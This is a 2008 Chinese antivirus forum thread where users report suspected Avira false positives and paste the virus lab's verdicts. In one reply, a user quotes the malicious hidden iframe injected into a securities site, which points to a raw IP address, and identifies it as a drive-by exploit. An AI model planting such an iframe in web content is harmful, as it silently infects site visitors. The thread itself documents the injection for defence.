红伞误报收集站

marshalking

文件名：xdict.exe
a virus or unwanted program was found.

未上报

hello1577

中国电子地图2008地图客版中的一个文件

Thank you for your submission. Below you can see the current status of the uploaded files.



A listing of files alongside their results can be found below:File ID         Filename        Size (Byte)        Result
3733315         Analysis.dll         28 KB         MALWARE



Please find a detailed report concerning each individual sample below: Filename        Result
 Analysis.dll         MALWARE


 he file 'Analysis.dll' has been determined to be 'MALWARE'. Our analysts named the threat ADSPY/Agent.28672. The term "ADSPY/" denotes adware or spyware. This type of malware is able to change browser settings for example by manipulating registry settings or by using of NTFS-streams. Very often IEexploits are used to manipulate the browserhelp.dll.Detection is added to our virus definition file (VDF) starting with version 7.00.02.08. Please note that Avira's proactive heuristic detection module AHeAD detected this threat up front without the latest VDF update as: HEUR/Malware.

Please note that you will receive an email which will contain the results shown above. In case the final outcome of the analysis is not yet finished for all files the notification will be sent once ready.

wwtd

半条命2中文硬盘版中的一个文件，
7：31分上报，16：22分回复，速度还是比较令人满意的
Dear Sir or Madam,

Thank you for your email to Avira's virus lab.
Tracking number: INC00161517.


A listing of files alongside their results can be found below:

File ID	Filename	Size (Byte)	Result
25043370	Steam.dll.bak	926.5 KB	FALSE POSITIVE

Please find a detailed report concerning each individual sample below:

Filename	Result
Steam.dll.bak	FALSE POSITIVE

The file 'Steam.dll.bak' has been determined to be 'FALSE POSITIVE'. In particular this means that this file is not malicious but a false alarm. Detection will be removed from our virus definition file (VDF) with one of the next updates.

dingguo110

HEUR/HTML.Malware这个是误报吧，我打开我们这里这个证券交易所的官方网站就出现这个．
http://gtjatj.com/Index.html这个是官方网站

will

不是误报  的确是挂马了  利用多种软件漏洞挂马的
被插入的恶意代码是：
[code]<iframe src="http://125.64.92.56/iisstart.htm" width="100" height="0"></iframe>[/code]

killerwhale

文件名/软件名                                   软件更新检查器
误报名                                               ADSPY/AdMedia.CJ
下载地址/链接地址（如有的话）       http://www.jprj.com/ruanjian_gengxin_jiancha/
附件（方便上传的话）                      太大了上传不了
是否上报：                                        已上报               
上报分析结果：
A listing of files alongside their results can be found below:

File ID	Filename	Size (Byte)	Result
25048001	Software_Update_C...er.exe	692 KB	FALSE POSITIVE

Please find a detailed report concerning each individual sample below:

Filename	Result
Software_Update_C...er.exe	FALSE POSITIVE

The file 'Software_Update_Checker.exe' has been determined to be 'FALSE POSITIVE'. In particular this means that this file is not malicious but a false alarm. Detection will be removed from our virus definition file (VDF) with one of the next updates.

赞一下红伞的反馈速度

[ 本帖最后由 killerwhale 于 2008-6-17 20:34 编辑 ]

zc6338396

文件名:hid.dll

是否上报：未上报

无尽藏海

The file 'hid.dll' has been determined to be 'FALSE POSITIVE'. In particular this means that this file is not malicious but a false alarm. Detection will be removed from our virus definition file (VDF) with one of the next updates.

[ 本帖最后由 无尽藏海 于 2008-6-20 21:58 编辑 ]

潇洒哥

最近时间在看脱壳教程以及些软件.经过NOD32.卡巴.金山.测试没发现病毒.
所以发到这里看看.
我对上报也不太懂.就压缩付件了。

潇洒哥

同上.因为付件大了。所以上传到网盘下载.
麻烦管理了.谢谢.
http://disk2.163disk.com/ContentPane.aspx?down=ok&filepath=laoyang527%2f3%b8%f6%d1%f9%b1%be.rar